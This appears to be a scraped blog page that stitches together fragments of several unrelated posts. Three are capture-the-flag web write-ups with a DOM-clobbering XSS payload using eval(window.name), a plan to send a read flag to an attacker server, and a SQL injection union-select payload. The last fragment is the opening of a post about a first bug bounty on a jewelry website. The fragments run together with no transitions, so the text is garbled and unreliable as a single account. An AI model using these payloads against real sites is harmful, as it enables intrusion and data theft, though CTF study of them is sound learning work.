tl;dr

• XSS using DOM Clobbering
• <a id="showInfos"></a><a id="SETTINGS" name=check data-timezone="aaa" data-location="eval(window.name)"><a id="SETTINGS" name="x">
• Bypass CSRF protection to execute XSS and read flag.

tl;dr

• Leak admin’s hash using wildcard target origin in postMessage or by calculating sha256('').
• Create an XSS payload to read /api/flag and send it to attacker server.

First of all, a big shoutout to the challenge author. All the challenges in this set are available here.

## Analysis

Going through the challenge source, we can see that two JavaScript files are imported.

1
2

    <script src="https://raw.githack.com/stretchr/arg.js/master/dist/arg-1.4.js"></script>
    <script src="js/main.js"></script>

arg-1.4.js is a popular library for parsing URL parameters. And main.js has the following content.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

let data = {
    small: "Hi, there!",
    big: "Hello, world!"
}

const vuln = document.querySelector("#vuln");
let queryStrings = window.location.search;
let params = new URLSearchParams(queryStrings);

let vulnParams = () => {
    let fragments = Arg.parse(location.hash.substr(1));
    if(data[params.get("type")] !== undefined) vuln.innerHTML = "<h2>"+data[params.get("type")]+"</h2";
    else vuln.innerHTML = "<h2>This region seems like something you need to look at.</h2>";
}

window.onhashchange = () => {
    vulnParams();
}

vulnParams();

We can see that main.js uses Arg library to parse location.hash and uses URLSearchParams to parse query strings.

tl;dr

• Make a GET request to /gettoken%3fcreditcard=mmm&promocode=FREEWAF to get the token.
• Using the token make another request with {"name":"' union select flag, 1, 1, 1 from flag -- -", "name":"x"} to get the flag.

# Intro

Hello everyone, it’s been over a month I have shared something on my blog. I was busy with academic stuff and CTFs. But finally, I have decided to take some time to write a post on my first bug bounty. The bug was small and easy to exploit, however, let this be a motivation to all who haven’t yet found their first bug.

I found the bug on a jewelry website. They did not have any vulnerability disclosure programs, but I was lucky enough to get a positive response from them. It was on a fine evening, after all the “hustle and bustle” of online classes ended, I was scrolling through my Instagram feed and I noticed an advertisement for a jewelry website.